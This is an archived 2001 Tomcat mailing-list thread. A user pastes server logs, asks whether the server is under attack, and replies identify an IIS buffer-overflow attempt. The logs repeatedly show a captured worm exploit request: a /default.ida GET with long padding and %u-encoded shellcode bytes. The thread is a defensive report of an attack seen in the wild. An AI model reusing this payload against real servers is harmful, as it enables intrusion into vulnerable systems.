You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@tomcat.apache.org by "Kasnol (2001)" <ka...@hotmail.com> on 2001/08/05 16:32:21 UTC
Is someone attempting to hack my server's tomcat 3.2.3?
Hello all,
I am using tomcat 3.2.3, windows 2000 professional at my home, upon
occasional inspection of my tomcat log, an intresting, strange error is
observed and enclosed below. I only can caputure 200 lines from my log
screen, but below is the best bit of the tomcat output. The full version is
appended below to my message:
Parse error, missing : in ccept: */*
t
Full GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xmlHOST:www.worm.com Accept: */*
trol: bypass-client=202.156.138.27
Connection: closeVia: 1.0 <STIX>HHCE3X-Forwarded-For: 202.156.138.27
I can tell that someone is trying to access via GET method, and
default.ida(?) or is it downloading somestuff somewhere in the net?
I believe it can be somehow related to the recent worm scare at win2k.
Is someone trying to implant a worm in my computer, or is this something
tomcat, win2k, is vulnerable to ?
I haven't seen anything wrong with my computer yet... but I guess I should
start a full visurs scan
Thankx!
Any help/light is appreciated
Regards
Kas
/***************************** Log Description ***************************/
2001-08-05 19:53:07 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
Parse error, missing : in ccept: */*
t
Full GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%
u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xmlHOST:www.worm.com Accept: */*
trol: bypass-client=202.156.138.27Connection: closeVia: 1.0
<STIX>HHCE3X-Forward
ed-For: 202.156.138.27
2001-08-05 19:55:27 - Ctx( ): 404 R( + /default.ida + null) null
2001-08-05 20:10:54 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:23:28 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:29:41 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 20:52:17 - ContextManager: SocketException reading request,
ignored -
java.net.SocketException: Connection reset by peer: JVM_recv in socket
input st
ream read
at java.net.SocketInputStream.socketRead(Native Method)
at java.net.SocketInputStream.read(SocketInputStream.java:86)
at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
at
org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
dapter.java:115)
at
org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
letInputStream.java:106)
at
org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
tInputStream.java:128)
at
javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
)
at
org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
pRequestAdapter.java:129)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:198)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:11:37 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:14:54 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:16:17 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:22:47 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:25:25 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:29:39 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:43:10 - ContextManager: SocketException reading request,
ignored -
java.net.SocketException: Connection reset by peer: JVM_recv in socket
input st
ream read
at java.net.SocketInputStream.socketRead(Native Method)
at java.net.SocketInputStream.read(SocketInputStream.java:86)
at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
at
org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
dapter.java:115)
at
org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
letInputStream.java:106)
at
org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
tInputStream.java:128)
at
javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
)
at
org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
pRequestAdapter.java:129)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:198)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:52:23 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:56:15 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 21:58:14 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
2001-08-05 22:08:40 - ContextManager: Error reading request, ignored -
java.lang
.NumberFormatException: 3379
at java.lang.Integer.parseInt(Integer.java:423)
at java.lang.Integer.parseInt(Integer.java:463)
at
org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
284)
at
org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
n(HttpConnectionHandler.java:200)
at
org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
416)
at
org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
:501)
at java.lang.Thread.run(Thread.java:484)
RE: Is someone attempting to hack my server's tomcat 3.2.3?
Posted by Jeff Rancier <je...@softechnics.com>.
Beth, do you have a link for a write up?
Jeff
-----Original Message-----
From: Beth Kelly [mailto:bethkelly@bellsouth.net]
Sent: Sunday, August 05, 2001 1:07 PM
To: tomcat-user@jakarta.apache.org
Subject: Re: Is someone attempting to hack my server's tomcat 3.2.3?
They are trying to exploit a buffer overflow bug in IIS. They keep trying
to do the same thing to me, but I am not running IIS or have it installed.
Kyle Wayne Kelly
(504)391-3985
http://www.cs.uno.edu/~kkelly
----- Original Message -----
From: "Kasnol (2001)" <ka...@hotmail.com>
To: <to...@jakarta.apache.org>
Sent: Sunday, August 05, 2001 7:32 AM
Subject: Is someone attempting to hack my server's tomcat 3.2.3?
> Hello all,
>
> I am using tomcat 3.2.3, windows 2000 professional at my home, upon
> occasional inspection of my tomcat log, an intresting, strange error is
> observed and enclosed below. I only can caputure 200 lines from my log
> screen, but below is the best bit of the tomcat output. The full version
is
> appended below to my message:
>
> Parse error, missing : in ccept: */*
> t
> Full GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27
> Connection: closeVia: 1.0 <STIX>HHCE3X-Forwarded-For: 202.156.138.27
>
> I can tell that someone is trying to access via GET method, and
> default.ida(?) or is it downloading somestuff somewhere in the net?
>
> I believe it can be somehow related to the recent worm scare at win2k.
> Is someone trying to implant a worm in my computer, or is this something
> tomcat, win2k, is vulnerable to ?
> I haven't seen anything wrong with my computer yet... but I guess I should
> start a full visurs scan
>
> Thankx!
> Any help/light is appreciated
> Regards
> Kas
>
> /***************************** Log Description
***************************/
> 2001-08-05 19:53:07 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> Parse error, missing : in ccept: */*
> t
> Full GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27Connection: closeVia: 1.0
> <STIX>HHCE3X-Forward
> ed-For: 202.156.138.27
>
> 2001-08-05 19:55:27 - Ctx( ): 404 R( + /default.ida + null) null
> 2001-08-05 20:10:54 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:23:28 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:29:41 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 20:52:17 - ContextManager: SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer: JVM_recv in socket
> input st
> ream read
> at java.net.SocketInputStream.socketRead(Native Method)
> at java.net.SocketInputStream.read(SocketInputStream.java:86)
> at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
> org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
> org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
> javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:11:37 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:14:54 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:16:17 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:22:47 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:25:25 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:29:39 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:43:10 - ContextManager: SocketException reading request,
> ignored -
> java.net.SocketException: Connection reset by peer: JVM_recv in socket
> input st
> ream read
> at java.net.SocketInputStream.socketRead(Native Method)
> at java.net.SocketInputStream.read(SocketInputStream.java:86)
> at java.io.BufferedInputStream.fill(BufferedInputStream.java:186)
> at java.io.BufferedInputStream.read(BufferedInputStream.java:204)
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.doRead(HttpRequestA
> dapter.java:115)
> at
> org.apache.tomcat.core.BufferedServletInputStream.doRead(BufferedServ
> letInputStream.java:106)
> at
> org.apache.tomcat.core.BufferedServletInputStream.read(BufferedServle
> tInputStream.java:128)
> at
> javax.servlet.ServletInputStream.readLine(ServletInputStream.java:138
> )
> at
> org.apache.tomcat.service.http.HttpRequestAdapter.readNextRequest(Htt
> pRequestAdapter.java:129)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:198)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:52:23 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:56:15 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 21:58:14 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
>
> 2001-08-05 22:08:40 - ContextManager: Error reading request, ignored -
> java.lang
> .NumberFormatException: 3379
> at java.lang.Integer.parseInt(Integer.java:423)
> at java.lang.Integer.parseInt(Integer.java:463)
> at
> org.apache.tomcat.core.RequestImpl.getContentLength(RequestImpl.java:
> 284)
> at
> org.apache.tomcat.service.http.HttpConnectionHandler.processConnectio
> n(HttpConnectionHandler.java:200)
> at
> org.apache.tomcat.service.TcpWorkerThread.runIt(PoolTcpEndpoint.java:
> 416)
> at
> org.apache.tomcat.util.ThreadPool$ControlRunnable.run(ThreadPool.java
> :501)
> at java.lang.Thread.run(Thread.java:484)
Re: Is someone attempting to hack my server's tomcat 3.2.3?
Posted by Beth Kelly <be...@bellsouth.net>.
They are trying to exploit a buffer overflow bug in IIS. They keep trying
to do the same thing to me, but I am not running IIS or have it installed.
Kyle Wayne Kelly
(504)391-3985
http://www.cs.uno.edu/~kkelly
----- Original Message -----
From: "Kasnol (2001)" <ka...@hotmail.com>
To: <to...@jakarta.apache.org>
Sent: Sunday, August 05, 2001 7:32 AM
Subject: Is someone attempting to hack my server's tomcat 3.2.3?
> Hello all,
>
> I am using tomcat 3.2.3, windows 2000 professional at my home, upon
> occasional inspection of my tomcat log, an intresting, strange error is
> observed and enclosed below. I only can caputure 200 lines from my log
> screen, but below is the best bit of the tomcat output. The full version
is
> appended below to my message:
>
> Parse error, missing : in ccept: */*
> t
> Full GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNN
>
NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
> 801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
> Content-type: text/xmlHOST:www.worm.com Accept: */*
> trol: bypass-client=202.156.138.27
> Connection: closeVia: 1.0 <STIX>HHCE3X-Forwarded-For: 202.156.138.27
>
> I can tell that someone is trying to access via GET method, and
